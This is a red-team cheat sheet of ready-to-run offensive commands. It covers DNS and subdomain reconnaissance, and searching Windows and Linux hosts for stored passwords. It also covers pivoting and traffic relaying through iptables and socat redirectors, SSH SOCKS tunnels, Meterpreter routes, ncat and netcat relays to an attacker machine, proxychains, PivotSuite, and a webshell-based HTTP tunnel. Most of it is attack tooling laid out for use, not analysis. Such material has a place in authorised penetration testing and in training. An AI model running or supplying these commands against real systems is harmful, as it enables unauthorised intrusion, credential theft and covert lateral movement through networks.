Red team - Cheat sheet

LDAP & DNS

DNS Recon

dnsrecon -d website.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml

#lookup website.com using a wordlit using standard type of enum, output to xml filed dnsrecon.xml

dnsrecon -d website.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml --name_server 8.8.8.8

DNS Enum

dnsenum --dnsserver x.x.x.x -enum www.fakewebsite.com

SUBDOMAIN Enum

sublist3r -d www.blah.com -t 3 -e bing

Dig

DIG = Domain Internet Groper

Get IP

dig www.blah.com

Get IP using another DNS Server (useful if UPD 53 is open on the target server)

dig -server 8.8.8.8 www. www.blah.com

Do a reverse lookup

dig @8.8.8.8 -x 8.8.8.8

Dig all the things

dig www.blah.com ANY

Low Hanging Passwords

Enumerate password on windows

dir /b /a /s c:\ > cdirs.txt

After downloading .txt file to the attackers machine open it.

Parse for keywords
command: type cdirs.txt | findstr /i passw
After finding interesting file or directory
command: type c:\Users\Fred\Documents\passwords.txt

One thing to remember is we only enumerated the c:\ drive on the pc. There could be other network drives.

Enumerate password on linux

We gonna search in /etc for the word password
It could also be in /home or /var for the word pwd

grep --color=auto -rnw '/etc' -ie "password" --color=always 2> /dev/null

Pivots forwarders relays

HTTP Forwarding with iptables

My environment in this lab:

• Team server and a listening port: 10.0.0.2:80
• Re-director host and a listening port: 10.0.0.5:80
• Victim host: 10.0.0.11

An easy way to create an HTTP re-director is to use a Linux box and its iptables capability.

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

HTTP Forwarding with SOCAT

SOCAT is another tool that can be used to do the “dumb pipe” traffic forwarding.
The environment in this exercise remains the same as in the previous scenario.

Setting up an HTTP redirector with socat:

socat TCP4-LISTEN:80,fork TCP4:10.0.0.2:80

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:

$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxychains Setup

Install and configure proxychains

tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Double Pivot Proxychains

# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains to set port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains to set port 1081

proxychains nmap...

PivotSuite

# Similar features to other tools but support multilevel pivot
# Like Metasploit

# "Remote" local port forwarding
# On the pivot
$ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080

# "Remote" dynamic port forwarding
$ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080

Tunna / Fulcrom (HTTP)

# Everything is through HTTP 
# Bypass some IPS/IDS  

# First step is to deploy webshell on the target 
# Some are available with the tool (but not good) 
# Can be hard to use  

# Then on the attacker machine 
python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v